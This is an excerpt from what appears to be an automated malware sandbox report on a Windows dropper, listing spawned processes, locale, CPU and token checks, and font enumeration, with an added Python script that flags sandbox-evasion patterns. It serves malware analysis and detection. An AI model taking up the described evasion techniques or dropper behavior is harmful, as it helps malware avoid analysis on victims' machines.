Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe Process created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe Process created: unknown unknown
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe c:\users\user\pictures\mx6oxfuxxljnkbd9f2dplyyc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe Process created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe c:\users\user\pictures\51fuipaxuixvsfnlfylcdduf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe Process created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe c:\users\user\pictures\8ang0kr81h7ichssfxxzspja.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe c:\users\user\pictures\mx6oxfuxxljnkbd9f2dplyyc.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe Process created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe c:\users\user\pictures\51fuipaxuixvsfnlfylcdduf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe Process created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe c:\users\user\pictures\8ang0kr81h7ichssfxxzspja.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: 14_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,14_2_0042E09C
Source: BroomSetup.exe, 00000014.00000002.3151972256.000000000041C000.00000040.00000001.01000000.00000016.sdmp Binary or memory string: Shell_TrayWndSVW
Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: k..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp Binary or memory string: ..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp Binary or memory string: [sk..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
Source: BroomSetup.exe, 00000014.00000002.3151972256.000000000041C000.00000040.00000001.01000000.00000016.sdmp Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: 17_2_6A3DB341 cpuid 17_2_6A3DB341
Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: GetLocaleInfoA,12_2_0040520C
Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe Code function: GetLocaleInfoA,12_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: GetLocaleInfoA,14_2_00408568
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp Code function: GetLocaleInfoA,14_2_004085B4
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,17_2_00414570
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
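The locale, keyboard-layout, cpuid and CentralProcessor entries above are the raw evidence behind the report's "Found evasive API chain (may stop execution after checking locale)" and sandbox-detection signatures, and the WerFault lines record that a process (PID 7564) crashed during the run. When triaging a report this long it helps to fold the flat behavior list into a per-process view. The following Python script is an added example, not part of the Joe Sandbox report: it parses lines in the "Source: <process> <event>: <detail>" format used here (accepting both the run-together "exeProcess created" form and the spaced form), tags each source process with what it did, and lists processes that combine a locale check with hardware fingerprinting. The sample lines are copied from this section; the tag names and the "locale plus hardware" heuristic are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample: behavior lines copied from this report section
# (kept in the original "exeProcess created" run-together form where the page has it).
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564",
    r"Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe Process created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --url=https://crashstats-collector.opera.com/collector/submit --annotation=prod=OperaDesktop",
    r"Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,14_2_0042E09C",
    r"Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DB341 cpuid 17_2_6A3DB341",
    r"Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: GetLocaleInfoA,12_2_0040520C",
    r"Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,17_2_00414570",
    r"Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0",
    r"Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation",
]

# Non-greedy source path, optional whitespace, then one of the event kinds seen in the report.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*"
    r"(?P<kind>Process created|Code function|Registry key value queried"
    r"|Queries volume information|Binary or memory string):\s*(?P<detail>.*)$"
)

# (event kind, regex over the detail text, tag). Tag names are this example's own.
RULES = [
    ("Code function", r"\b(GetLocaleInfoA|GetKeyboardLayoutList)\b", "locale-check"),
    ("Code function", r"\bcpuid\b", "hw-fingerprint"),
    ("Registry key value queried", r"\\CentralProcessor\\", "hw-fingerprint"),
    ("Code function", r"AllocateAndInitializeSid.*CheckTokenMembership", "admin-check"),
    ("Process created", r"--type=crashpad-handler", "crashpad-child"),
    ("Process created", r"\\WerFault\.exe\b", "crash-reported"),
    ("Queries volume information", r"\\Windows\\Fonts\\", "font-enum"),
]
WERFAULT_PID = re.compile(r"\s-p\s+(\d+)\b")  # "-p <pid>" on the WerFault command line


def parse_line(line):
    """Split one report line into (source_process, event_kind, detail), or None if not a behavior line."""
    m = LINE_RE.match(line.strip())
    return None if m is None else (m.group("src"), m.group("kind"), m.group("detail"))


def tag_event(kind, detail):
    return {tag for rule_kind, pattern, tag in RULES
            if kind == rule_kind and re.search(pattern, detail)}


def summarize(lines):
    """Group events by source process: tags seen, per-kind counts, and PIDs WerFault was launched for."""
    out = defaultdict(lambda: {"tags": set(), "counts": defaultdict(int), "crashed_pids": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, kind, detail = parsed
        rec = out[src]
        rec["counts"][kind] += 1
        tags = tag_event(kind, detail)
        rec["tags"] |= tags
        if "crash-reported" in tags:
            pid = WERFAULT_PID.search(detail)
            if pid:
                rec["crashed_pids"].add(int(pid.group(1)))
    return dict(out)


def evasion_suspects(summary):
    """Processes that both read the locale/keyboard layout and fingerprint the CPU."""
    return sorted(src for src, rec in summary.items()
                  if {"locale-check", "hw-fingerprint"} <= rec["tags"])


if __name__ == "__main__":
    summary = summarize(SAMPLE_LINES)
    for src, rec in summary.items():
        print(f"{src}: tags={sorted(rec['tags'])} counts={dict(rec['counts'])} "
              f"crashed={sorted(rec['crashed_pids'])}")
    print("evasion suspects:", evasion_suspects(summary))
```

On the sample, syncUpd.exe is the only process tagged with both a locale check and hardware fingerprinting; fwUkFVOLVOFs3NY104r7giRJ.exe only reads the locale, which on its own is common in installers (its .tmp sibling's AllocateAndInitializeSid/CheckTokenMembership chain is the standard "is the caller an administrator" test). The font-enumeration lines from file.exe are tagged so that they can be filtered out as noise rather than read one by one.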
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
